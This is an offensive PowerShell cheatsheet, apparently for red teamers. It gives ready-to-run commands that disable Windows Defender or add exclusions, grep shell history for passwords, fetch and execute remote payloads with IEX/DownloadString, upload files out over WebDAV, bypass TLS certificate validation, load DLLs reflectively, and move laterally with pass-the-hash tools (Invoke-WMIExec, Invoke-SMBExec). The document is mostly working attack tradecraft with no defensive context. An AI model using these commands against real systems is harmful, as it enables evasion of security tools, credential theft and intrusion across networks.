Powershell cheatsheet
=====================

[[_TOC_]]

#### Windows Defender
##### Add Windows Defender exclusion path
Requires administrative privileges

    powershell -exec bypass "Add-MpPreference -ExclusionPath 'C:\path\to\evil'"

##### Disable Windows Defender
Requires administrative privileges

    powershell -exec bypass "Set-MpPreference -DisableRealtimeMonitoring $true

#### Stealthy powershell filesnames
Regex

    __PSScriptPolicyTest_[a-b0-9]{9}\.[a-z0-9]{3}\.ps1

e.g.

    C:\WINDOWS\TEMP\__PSScriptPolicyTest_u3lrbaun.eqb.ps1

#### Read history and grep

    cat (Get-PSReadlineOption).HistorySavePath | sls password

#### Powerhell RunAs

    $password = ConvertTo-SecureString "<password>" -AsPlainText -Force
    $creds = New-Object System.Management.Automation.PSCredential ("<domain>\<username>", $password)
    $hostname = "<hostname>"
    [System.Diagnostics.Process]::Start("C:\Windows\System32\cmd.exe", "", $creds.Username, $creds.Password, $hostname)

or

    $password = ConvertTo-SecureString "<password>" -AsPlainText -Force
    $creds = New-Object System.Management.Automation.PSCredential ("<domain>\<username>", $password)
    Start-Process powershell.exe -Credential $creds -NoNewWindow -ArgumentList "-nop -w 1 -sta -c IEX (New-Object System.Net.WebClient).DownloadString('http://127.0.0.1/evil')"

#### Powershell Remoting

    $password = ConvertTo-SecureString "<password>" -AsPlainText -Force;
    $creds = New-Object System.Management.Automation.PSCredential("<domain>\<username>", $password)
    Invoke-Command -ComputerName <hostname> -Credential $creds -ScriptBlock { IEX (New-Object System.Net.WebClient).DownloadString('http://127.0.0.1/evil') };

    Enter-PSSession <hostname> -Credential <domain>\<user>
    Enter-PSSession <hostname> -Authentication Kerberos

#### Base64-encode file via Powershell

    [Convert]::ToBase64String([IO.File]::ReadAllBytes(".\file"))

#### Base64-decode file via Powershell

    [IO.File]::WriteAllBytes($FileName, [Convert]::FromBase64String("<base64string>"))

#### Download files via Powershell

    powershell.exe -nop -w 1 -sta -c (New-Object System.Net.WebClient).DownloadFile('http://<ip>/file.exe','c:\dest\folder\file.exe')
    powershell.exe -nop -w 1 -sta -c (Start-BitsTransfer -Source "http://<ip>/file.exe -Destination C:\dest\folder\file.exe")
    powershell.exe wget "http://<ip>/file.exe" -outfile "c:\dest\folder\file.exe"

#### Upload file via Powershell to WebDav (e.g. wsgidav)
Over HTTP

    (New-Object System.Net.WebClient).UploadFile("http://127.0.0.1/test.txt", "PUT", "C:\test.txt")

Over HTTPS with selfsigned certificate

    [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};(New-Object System.Net.WebClient).UploadFile("https://127.0.0.1/test.txt", "PUT", "C:\test.txt")

Another selfsigned certificate bypass for newer Powershell versions

    add-type @"
    using System.Net;
    using System.Security.Cryptography.X509Certificates;
    public class TrustAllCertsPolicy : ICertificatePolicy {
        public bool CheckValidationResult(
            ServicePoint srvPoint, X509Certificate certificate,
            WebRequest request, int certificateProblem) {
            return true;
        }
    }
    "@
    [System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy

#### Assembly reflection from DLL on disk

    $FileBytes = [System.IO.File]::ReadAllBytes("C:\evil.dll")
    [Reflection.Assembly]::Load($FileBytes)
    [ClassName]::MethodName()

#### Lateral movement with Invoke-TheHash
From [https://github.com/Kevin-Robertson/Invoke-TheHash](https://github.com/Kevin-Robertson/Invoke-TheHash)

Invoke-WMIExec

    powershell.exe -nop -w 1 -sta -c (New-Object System.Net.WebClient).DownloadString('http://127.0.0.1/Invoke-WMIExec.ps1')
    Invoke-WMIExec -Target <ip_address> -Domain <domain_or_workgroup> -Username <username> -Hash <ntlm_hash> -Command "<command>" -Verbose

Invoke-SMBExec

    powershell.exe -nop -w 1 -sta -c (New-Object System.Net.WebClient).DownloadString('http://127.0.0.1/Invoke-SMBExec.ps1')
    Invoke-SMBExec -Target <ip_address> -Domain <domain_or_workgroup> -Username <username> -Hash <ntlm_hash> -Command "<command>" -Verbose

